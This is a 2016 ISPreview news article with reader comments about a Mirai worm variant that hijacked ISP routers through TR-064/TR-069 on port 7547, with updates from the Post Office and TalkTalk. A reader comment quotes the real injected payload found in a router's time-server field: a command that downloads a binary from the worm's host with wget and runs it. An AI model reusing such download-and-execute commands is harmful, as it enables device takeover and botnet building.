» ISP News » 

UPDATE3 TalkTalk and Other ISP Routers Potentially Vulnerable to New Mirai Worm

Tuesday, November 29th, 2016 (9:24 am) - Score 11,799

It’s spreading fast! A newly modified version of the malicious Mirai worm, which has recently been remotely infecting masses of different broadband routers at other European ISPs (900,000+ in Germany), may soon begin to hit devices in the United Kingdom too, such as TalkTalk’s D-Link DSL-3780 kit.

The Mirai malware first came to light a couple of months ago after it infected a huge number of popular Internet connected devices, such as surveillance cameras and DVRs, which were then hijacked and turned into a gigantic botnet that was harnessed by hackers for conducting massive Distributed Denial of Service (DDoS) attacks.

Since then somebody has modified Mirai and enabled it to exploit weaknesses in the popular TR-069 (remote management) and related TR-064 (LAN-Side DSL CPE Configuration) protocols, which are commonly enabled in broadband routers supplied by ISPs and help the provider to keep your device updated with the latest firmware or to perform various other tasks (e.g. diagnostics).

Many routers that use TR-069 and TR-064 tend to leave Internet port 7547 open to outside connections (ports like 5555 may also be targeted) and the modified version of Mirai has found to way to exploit this, which appears to be based off a recently discovered proof of concept exploit (here and here).

In short, the attack can instruct TR-064 on vulnerable routers to open port 80 (usually used for HTTP website traffic) on the device’s firewall, which then allows the hacker access to its web-based admin interface. After that point a command injection can be used to exploit various weaknesses and before you know it the router has been hijacked.

Whoever is behind the attack can now steal your WiFi details, change the router’s settings (e.g. adjusting the DNS settings to snoop on your Internet traffic or conduct attacks) and basically do all sorts of nasty things with the device or your Internet connection / network traffic.

SANS Internet Storm Centre Advisory

If you suspect that you have a vulnerable router, then reboot it, and check if port 7547 is listening after you reboot (if infected, the router will no longer listen). If you can, block port 7547 and update your firmware if there is an update available. A reboot will “clean” the router until it is infected again.

Somewhat expected, but with the old host name l.ocalhost.host being taken down, the bot now uses timeserver.host and ntp.timerserver.host. Both resolve to for now.

For the last couple days, attacks against port 7547 have increased substantially. These scans appear to exploit a vulnerability in popular DSL routers. This issue may already have caused severe issues for German ISP Deutsche Telekom and may affect others as well (given that the US is just “waking up” from a long weekend). For Deutsche Telekom, Speedport routers appeared to be the main issue.

According to Shodan, about 41 Million devices have port 7547 open [ISPr Ed: Only some of those will be vulnerable to this]. The code appears to be derived from Mirai with the additional scan for the SOAP vulnerability. Currently, honeypots see about one request every 5-10 minutes for each target IP.

What’s striking about this is just how many routers, often from different manufacturers, appear to be vulnerable. The attack started by hitting Eir in Ireland and then Deutsche Telekom’s Speedport W 921V and Speedport W 723V Type B (T-Com/T-home) in Germany, but it can also infect ZyXEL’s D-1000 and P-660HN-T1A, various D-Link routers and others from MitraStar, Digicom, Aztech and possibly more.

Security researchers suggest that TalkTalk’s D-Link DSL-3780 based kit may also be vulnerable, although as yet it remains unclear quite how many makes and models of router are exposed to the exploit. The Mirai code will no doubt continue to be tweaked and so even those that aren’t vulnerable today might still be exploited tomorrow.

So far none of BT, Sky Broadband or Virgin Media’s kit has been affected, although ISPs would be wise to pay attention to this threat and liaise with their partners in order to ensure that the firmware on their customer router(s) is not at risk. We did ask TalkTalk and so far the ISP has not been able to confirm whether their kit is at risk, but they are checking.

UPDATE 30th November 2016

Some readers have pointed out that the ZyXEL AMG1302 router offered by the Post Office appears to be affected.

UPDATE 30th Nov 5:03pm

The Post Office has responded.

A Post Office Spokesperson told ISPreview.co.uk:

“Post Office can confirm that on 28/11 a third party attempted to disrupt the services of its broadband customers. Although this did result in some intermittent service problems we would like to reassure customers that no personal data has been compromised.

We would like to apologise to any customers who have been experiencing issues with their Post Office broadband service.

We constantly review our systems and processes to protect our customers against incidents of this nature.

No other Post Office services were affected.”

UPDATE 1st Dec 2016

Now customers of KCOM have been hit (here).

UPDATE 2nd Dec 2016

Sadly TalkTalk forgot to give us an update 3-4 days ago when everybody else got it, but here’s what one of their spokespeople finally told us: “Along with other ISPs in the UK and abroad, we are taking steps to review the potential impacts of the Mirai worm. A small number of customer routers have been affected, and we have deployed additional network-level controls to further protect our customers.” By “small” they still mean many.. many thousands.

Share with Twitter
Share with Linkedin
Share with Facebook
Share with Reddit
Share with Pinterest
Tags: ,
By Mark Jackson
Mark is a professional technology writer, IT consultant and computer engineer from Dorset (England), he also founded ISPreview in 1999 and enjoys analysing the latest telecoms and broadband developments. Find me on Twitter, , Facebook and Linkedin.
Leave a Comment
17 Responses
  1. Noel Burgess says:

    My Post Office Broadband router (ZyXEL AMG1302-T11B) was targeted yesterday evening. When the Internet connection dropped, I checked the router log and saw that the time wasn’t configured. When I looked to see the time settings, I saw that the first server address box contained ” `cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1` “; I couldn’t change it to a proper NTP server address like until I’d rebooted the router twice. The Internet connection was unstable until 16.15 today, but no news from PO Broadband.

    1. EndlessWaves says:

      My ZyXEL AMG1302-T10B also from Post Office broadband was similarly affected and kept freezing up when I tried to change the settings. I’ve eventually managed to reset it and turn remote management off, as well as change all the passwords and update the software. The latest update on ZyXEL’s site is dated 25th of November and mentions something about TR069:


    Last three night my TalkTalk router has reset.

  3. hmm says:

    cheap get real isp

  4. Emmy Strong says:

    I’ve written TR-069 systems for ISP’s prior to all the open source and paid offerings of current day. They designed from White Papers and RFC’s. The TR-069 protocol is fundamentally secure and has to be by design due to its enormous capability. There are ways to hack the protocol, which I’m not prepared to disclose. What I will say, I was requested to do a penetration test earlier this year by an ISP. Within hours I successfully changed a be-nine parameter on the ISP’s base of routers. It took only one periodic inform from each router and the control could have been lost.
    ISP’shave a responsibility to ensure that their product is secure. Using standard “ConnectionRequestPorts”, no firewalls, no credentials for invoking connection a request, not making the TR-069 sever URL “ReadOnly” among other things leave product vulnerable.
    ISP’s should look closer at their product, once you have the router you’re ready to knock on the door customers devices. It’s only time before this happens.
    Saying all of that, ISP’s and customers need TR-069 they just need to be careful!!

  5. Ethel Prunehat says:

    You can add Zyxel AMG1202 to the list. Even when TR069 is disabled in the settings, it’s still listening on the WAN on port 7547!

    1. Pat Higgins says:

      confirming yes the amg1202-t10b and 1302 series Xyxel have now released a firmware update at version.16 which closes the vunerability – however the routers do need factory resets and in doing so will wipe all setting out and no original backup configs should be reused.

  6. FibreFred says:

    TalkTalk taking their security seriously again then?

    It’s made the BBC as well http://www.bbc.co.uk/news/technology-38167453

  7. ReadyToJumpISP says:

    This article was published 2 days ago. Thursday morning 1 December at 12 and then 2pm the TalkTalk support staff had no idea what I was talking about and couldn’t resolve me have lost control of my DSL3780 router. 🙁

    1. Mark Jackson says:

      You’ll find it’s been a similar story with most front line support staff at big ISPs, although the Post Office did seem to be more on the ball than most.

  8. Billy says:

    The support staff haven’t been issued with new scripts yet, they are still using the “Have you tried turning it off and on again” script from last century.

  9. We are getting calls from customers of Fuel Broadband also saying they are down with their supplied Zyxel modems.

  10. Virginia says:

    so, now that my TalkTalk D-Link DSL-3780 router is dead what can we do to protect our routers and attached equipment? This needs to be addressed as no matter what firewalls and anti virus software we put on our equipment that won’t protect the router which is the open gate for all this mess to get in.

    1. EndlessWaves says:

      Anti-virus and firewall programs are a second line of defence. The primary defence is the same as it is for other devices – keep the software up to date to ensure known security holes are patched.

      You should also consider turning off internet facing functions you don’t use such as remote management (I forgot after the last reset :\), and many routers profile firewalls as well.

      Unfortunately the situation is the same as usual. Users don’t know enough about the security side to judge but do care about the price tag so manufacturers either cut costs or lose business.

      I suspect the only real solution is to get consumer advice sources interested enough that they scrutinise this. If comparison sites, hardware reviewers and similar listed the length of security support and previous track records of routers, both bought and ISP provided, then I can only imagine it would have a positive impact.

  11. Whyme says:

    My virgin media account crashed at the weekend, I thought it was cyber weekend but when i looked at the service status, everything was ok. Took many prolonged reboots until its back up. Got a letter from Virgin to say my network is infected (so I scanned all my computers) and then got an email following week to say its infected with the Mirai worm. Long story short, the Mirai botnet worm has worked its way through my CCTV port and through to my DVR which it has somehow managed to change my password and gain access. How did I know, well when I went to remote view my CCTV through my phone, I got an error message to say my password is incorrect. The password security on these DVR are simple and poor. Anyway, Ive changed all passwords to my DVR and router and again today, my DVR beeped a message to say that the password doesn’t match, which meant someone (botnet) is trying to guess my password again. In the end, I thought changing the password and rebooting would get rid of the Menai virus but I just pulled the plug until I find a solution. Its making me paranoid now. I can’t virus scan the DVR so I’m puzzled what to do.

    1. Prof Deano says:

      Update the firmware or recopy the firmfire over the existing one.It useually does a mini format to stop conflicts. Not sure thou if ur DVR has firmware but most hardware does.

  12. jon-wlly says:

    I have the ZyXEL AMG1302-T11B router supplied by FUEL, this router was a replacement for one of their earlier routers which they blamed for the erratic service.
    Sadly the new one was infected and following their instructions it needed a factory re-set, this lost all my settings for my DVR CCTV system, unfortunately I am not sufficiently gifted to re-enter all the settings and rely on the CCTV company to do it at an obvious cost, but this is now twice within 12 months and it’s not cheap. JW

Comments are closed.

Comments RSS Feed

Javascript must be enabled to post (most browsers do this automatically)

Privacy Notice: Please note that news comments are anonymous, which means that we do NOT require you to enter any real personal details to post a message. By clicking to submit a post you agree to storing your comment content, display name, IP, email and / or website details in our database, for as long as the post remains live.

Only the submitted name and comment will be displayed in public, while the rest will be kept private (we will never share this outside of ISPreview, regardless of whether the data is real or fake). This comment system uses submitted IP, email and website address data to spot abuse and spammers. All data is transferred via an encrypted (https secure) session.

NOTE 1: Sometimes your comment might not appear immediately due to site cache (this is cleared every few hours) or it may be caught by automated moderation / anti-spam.

NOTE 2: Comments that break our rules, spam, troll or post via known fake IP/proxy servers may be blocked or removed.
Cheapest Ultrafast ISPs
  • Gigaclear £20.00 (*54.00)
    Speed: 400Mbps, Unlimited
    Gift: None
  • Vodafone £23.50 (*26.50)
    Speed: 100Mbps, Unlimited
    Gift: None
  • Hyperoptic £25.00 (*35.00)
    Speed: 150Mbps, Unlimited
    Gift: Promo Code: ROKUGIFT
  • Community Fibre £27.50 (*32.50)
    Speed: 200Mbps, Unlimited
    Gift: First 6 Months Free
  • Virgin Media £28.00 (*52.00)
    Speed: 108Mbps, Unlimited
    Gift: None
Large Availability | View All
Cheapest Superfast ISPs
  • Vodafone £19.50 (*22.50)
    Speed 38Mbps, Unlimited
    Gift: None
  • NOW £20.00 (*32.00)
    Speed 36Mbps, Unlimited
    Gift: None
  • Hyperoptic £20.00 (*25.00)
    Speed 50Mbps, Unlimited
    Gift: Promo Code: ROKUGIFT
  • TalkTalk £21.00 (*29.95)
    Speed 38Mbps, Unlimited
    Gift: None
  • Plusnet £21.95 (*38.20)
    Speed 36Mbps, Unlimited
    Gift: £75 Reward Card
Large Availability | View All
The Top 20 Category Tags
  1. FTTP (3663)
  2. BT (3043)
  3. Politics (1972)
  4. Building Digital UK (1942)
  5. FTTC (1897)
  6. Openreach (1862)
  7. Business (1717)
  8. Mobile Broadband (1500)
  9. Statistics (1427)
  10. FTTH (1367)
  11. 4G (1295)
  12. Virgin Media (1193)
  13. Fibre Optic (1184)
  14. Wireless Internet (1175)
  15. Ofcom Regulation (1165)
  16. Vodafone (859)
  17. EE (845)
  18. 5G (792)
  19. TalkTalk (779)
  20. Sky Broadband (756)
Helpful ISP Guides and Tips

Copyright © 1999 to Present - ISPreview.co.uk - All Rights Reserved - Terms , Privacy and Cookie Policy , Links , Website Rules , Contact